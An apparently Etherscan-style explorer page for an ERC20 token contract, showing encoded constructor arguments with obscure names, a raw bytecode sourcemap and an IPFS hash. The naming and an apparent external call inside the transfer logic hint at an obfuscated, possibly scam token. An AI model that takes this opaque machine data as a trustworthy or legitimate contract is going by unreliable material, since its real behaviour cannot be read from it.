6c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212205cdd376659fa546acc20e3d736051638816355524fdfdf90a8952b41422aabef64736f6c63430008000033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000000026492dd0710a14102004001d3208002350062200000000313c466141626cecc47ecdadf275ba1c987a266f5f3e0aa5e751967a000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
-----Decoded View---------------
Arg [0] : maxVals (uint256): 853803104190050701541105253827336502426732066
Arg [1] : minVals (uint256): 5185097956264309351979403242689583690996521159544864587994016880250
Arg [2] : _wllmm_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
-----Encoded View---------------
3 Constructor Arguments found :
Arg [0] : 0000000000000000000000000026492dd0710a14102004001d32080023500622
Arg [1] : 00000000313c466141626cecc47ecdadf275ba1c987a266f5f3e0aa5e751967a
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Deployed Bytecode Sourcemap
5485:9446:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7677:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8968:193;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;7835:102::-;;;:::i;:::-;;;;;;;:::i;10397:444::-;;;;;;:::i;:::-;;:::i;7365:86::-;;;:::i;:::-;;;;;;;:::i;11249:281::-;;;;;;:::i;:::-;;:::i;7999:162::-;;;;;;:::i;:::-;;:::i;6990:146::-;;;:::i;:::-;;9169:495;;;;;;:::i;:::-;;:::i;7217:81::-;;;:::i;:::-;;;;;;;:::i;7516:98::-;;;:::i;12032:381::-;;;;;;:::i;:::-;;:::i;8373:199::-;;;;;;:::i;:::-;;:::i;9738:188::-;;;:::i;8634:::-;;;;;;:::i;:::-;;:::i;7677:94::-;7725:13;7758:5;7751:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7677:94;:::o;8968:193::-;9072:4;9094:37;9103:10;9115:7;9124:6;9094:8;:37::i;:::-;-1:-1:-1;9149:4:0;8968:193;;;;:::o;7835:102::-;7917:12;;7835:102;:::o;10397:444::-;10531:4;10548:36;10558:6;10566:9;10577:6;10548:9;:36::i;:::-;10595:216;10618:6;10639:10;10664:136;10718:6;10664:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10664:19:0;;;;;;:11;:19;;;;;;;;10684:10;10664:31;;;;;;;;;:136;:35;:136::i;:::-;10595:8;:216::i;:::-;-1:-1:-1;10829:4:0;10397:444;;;;;:::o;7365:86::-;7442:1;7365:86;:::o;11249:281::-;11394:10;11349:4;11441:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;11441:32:0;;;;;;;;;;11349:4;;11371:129;;11419:7;;11441:48;;11478:10;11441:36;:48::i;7999:162::-;-1:-1:-1;;;;;8135:18:0;;8103:7;8135:18;;;:9;:18;;;;;;7999:162;;;;:::o;6990:146::-;6617:6;;-1:-1:-1;;;;;6617:6:0;6603:10;:20;6595:65;;;;-1:-1:-1;;;6595:65:0;;;;;;;:::i;:::-;;;;;;;;;7049:6:::1;:19:::0;;-1:-1:-1;;;;;;7049:19:0::1;::::0;;7084:44:::1;::::0;7066:1:::1;::::0;7105:10:::1;::::0;7084:44:::1;::::0;7066:1;;7084:44:::1;6990:146::o:0;9169:495::-;9234:10;:8;:10::i;:::-;9229:24;;9246:7;;9229:24;9264:10;9276;9291:4;;9296:1;9291:7;;;;;-1:-1:-1;;;9291:7:0;;;;;;;;;;;;;;;9300:4;;9305:1;9300:7;;;;;-1:-1:-1;;;9300:7:0;;;;;;;;;;;;;;;9263:45;;;;9353:1;9349:2;9346:9;9343:2;;;9385;9382:1;9375:13;9424:1;9421;9417:9;9413:2;9406:21;9470:2;9465;9462:1;9452:16;9445:28;9343:2;9505:9;9502:2;;9544;9541:1;9534:13;9583:1;9580;9576:9;9572:2;9565:21;9629:1;9624:2;9621:1;9611:16;9604:27;9502:2;9328:329;;;;;:::o;7217:81::-;7284:6;;-1:-1:-1;;;;;7284:6:0;7217:81;:::o;7516:98::-;7566:13;7599:7;7592:14;;;;;:::i;12032:381::-;12137:4;12159:224;12182:10;12207:7;12229:143;12284:15;12229:143;;;;;;;;;;;;;;;;;12241:10;12229:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;12229:32:0;;;;;;;;;;;:143;:36;:143::i;8373:199::-;8480:4;8502:40;8512:10;8524:9;8535:6;8502:9;:40::i;9738:188::-;9779:4;;9812:24;:8;9824:11;9812:24;:::i;:::-;9796:40;-1:-1:-1;9896:22:0;:8;9908:9;9896:22;:::i;:::-;9871:10;9855:36;;;9854:64;;-1:-1:-1;9738:188:0;:::o;8634:::-;-1:-1:-1;;;;;8786:19:0;;;8754:7;8786:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;8634:188::o;14232:374::-;-1:-1:-1;;;;;14361:20:0;;14353:69;;;;-1:-1:-1;;;14353:69:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14441:21:0;;14433:68;;;;-1:-1:-1;;;14433:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14512:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;;:37;;;14565:33;;;;;14543:6;;14565:33;:::i;:::-;;;;;;;;14232:374;;;:::o;12903:889::-;-1:-1:-1;;;;;13035:20:0;;13027:70;;;;-1:-1:-1;;;13027:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;13116:23:0;;13108:71;;;;-1:-1:-1;;;13108:71:0;;;;;;;:::i;:::-;13191:12;13205:17;13226:6;-1:-1:-1;;;;;13226:11:0;13298:6;13252:53;;;;;;;;:::i;:::-;;;;-1:-1:-1;;13252:53:0;;;;;;;;;;;;;;-1:-1:-1;;;;;13252:53:0;-1:-1:-1;;;13252:53:0;;;13226:90;;;13252:53;13226:90;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13190:126;;;;13331:7;13327:200;;;13434:4;13424:15;;;13418:22;-1:-1:-1;;;;;13477:13:0;;13355:12;13477:13;;;:5;:13;;;;;;;;13494:1;13477:18;;;:31;;-1:-1:-1;13499:9:0;;;13477:31;13469:46;;;;-1:-1:-1;;;13469:46:0;;;;;;;:::i;:::-;13327:200;;13559:108;13595:6;13559:108;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13559:17:0;;;;;;:9;:17;;;;;;;:108;:21;:108::i;:::-;-1:-1:-1;;;;;13539:17:0;;;;;;;:9;:17;;;;;;:128;;;;13701:20;;;;;;;:32;;13726:6;13701:24;:32::i;:::-;-1:-1:-1;;;;;13678:20:0;;;;;;;:9;:20;;;;;;;:55;;;;13749:35;;;;;;;;;;13777:6;;13749:35;:::i;:::-;;;;;;;;12903:889;;;;;:::o;1920:224::-;2040:7;2076:12;2068:6;;;;2060:29;;;;-1:-1:-1;;;2060:29:0;;;;;;;;:::i;:::-;-1:-1:-1;2100:9:0;2112:5;2116:1;2112;:5;:::i;:::-;2100:17;1920:224;-1:-1:-1;;;;;1920:224:0:o;1035:179::-;1093:7;;1125:5;1129:1;1125;:5;:::i;:::-;1113:17;;1154:1;1149;:6;;1141:46;;;;-1:-1:-1;;;1141:46:0;;;;;;;:::i;:::-;1205:1;1035:179;-1:-1:-1;;;1035:179:0:o;14:175:2:-;84:20;;-1:-1:-1;;;;;133:31:2;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:2:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:2;;-1:-1:-1;;;;1399:561:2:o;1965:274::-;;2132:6;2126:13;2148:53;2194:6;2189:3;2182:4;2174:6;2170:17;2148:53;:::i;:::-;2217:16;;;;;2102:137;-1:-1:-1;;2102:137:2:o;2244:203::-;-1:-1:-1;;;;;2408:32:2;;;;2390:51;;2378:2;2363:18;;2345:102::o;2452:187::-;2617:14;;2610:22;2592:41;;2580:2;2565:18;;2547:92::o;2644:383::-;;2793:2;2782:9;2775:21;2825:6;2819:13;2868:6;2863:2;2852:9;2848:18;2841:34;2884:66;2943:6;2938:2;2927:9;2923:18;2918:2;2910:6;2906:15;2884:66;:::i;:::-;3011:2;2990:15;-1:-1:-1;;2986:29:2;2971:45;;;;3018:2;2967:54;;2765:262;-1:-1:-1;;2765:262:2:o;3032:399::-;3234:2;3216:21;;;3273:2;3253:18;;;3246:30;3312:34;3307:2;3292:18;;3285:62;-1:-1:-1;;;3378:2:2;3363:18;;3356:33;3421:3;3406:19;;3206:225::o;3436:398::-;3638:2;3620:21;;;3677:2;3657:18;;;3650:30;3716:34;3711:2;3696:18;;3689:62;-1:-1:-1;;;3782:2:2;3767:18;;3760:32;3824:3;3809:19;;3610:224::o;3839:351::-;4041:2;4023:21;;;4080:2;4060:18;;;4053:30;4119:29;4114:2;4099:18;;4092:57;4181:2;4166:18;;4013:177::o;4195:325::-;4397:2;4379:21;;;4436:1;4416:18;;;4409:29;-1:-1:-1;;;4469:2:2;4454:18;;4447:32;4511:2;4496:18;;4369:151::o;4525:356::-;4727:2;4709:21;;;4746:18;;;4739:30;4805:34;4800:2;4785:18;;4778:62;4872:2;4857:18;;4699:182::o;4886:401::-;5088:2;5070:21;;;5127:2;5107:18;;;5100:30;5166:34;5161:2;5146:18;;5139:62;-1:-1:-1;;;5232:2:2;5217:18;;5210:35;5277:3;5262:19;;5060:227::o;5292:400::-;5494:2;5476:21;;;5533:2;5513:18;;;5506:30;5572:34;5567:2;5552:18;;5545:62;-1:-1:-1;;;5638:2:2;5623:18;;5616:34;5682:3;5667:19;;5466:226::o;5697:177::-;5843:25;;;5831:2;5816:18;;5798:76::o;5879:184::-;6051:4;6039:17;;;;6021:36;;6009:2;5994:18;;5976:87::o;6068:128::-;;6139:1;6135:6;6132:1;6129:13;6126:2;;;6145:18;;:::i;:::-;-1:-1:-1;6181:9:2;;6116:80::o;6201:168::-;;6307:1;6303;6299:6;6295:14;6292:1;6289:21;6284:1;6277:9;6270:17;6266:45;6263:2;;;6314:18;;:::i;:::-;-1:-1:-1;6354:9:2;;6253:116::o;6374:125::-;;6442:1;6439;6436:8;6433:2;;;6447:18;;:::i;:::-;-1:-1:-1;6484:9:2;;6423:76::o;6504:258::-;6576:1;6586:113;6600:6;6597:1;6594:13;6586:113;;;6676:11;;;6670:18;6657:11;;;6650:39;6622:2;6615:10;6586:113;;;6717:6;6714:1;6711:13;6708:2;;;-1:-1:-1;;6752:1:2;6734:16;;6727:27;6557:205::o;6767:380::-;6852:1;6842:12;;6899:1;6889:12;;;6910:2;;6964:4;6956:6;6952:17;6942:27;;6910:2;7017;7009:6;7006:14;6986:18;6983:38;6980:2;;;7063:10;7058:3;7054:20;7051:1;7044:31;7098:4;7095:1;7088:15;7126:4;7123:1;7116:15;6980:2;;6822:325;;;:::o;7152:127::-;7213:10;7208:3;7204:20;7201:1;7194:31;7244:4;7241:1;7234:15;7268:4;7265:1;7258:15
Swarm Source
ipfs://5cdd376659fa546acc20e3d736051638816355524fdfdf90a8952b41422aabef
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.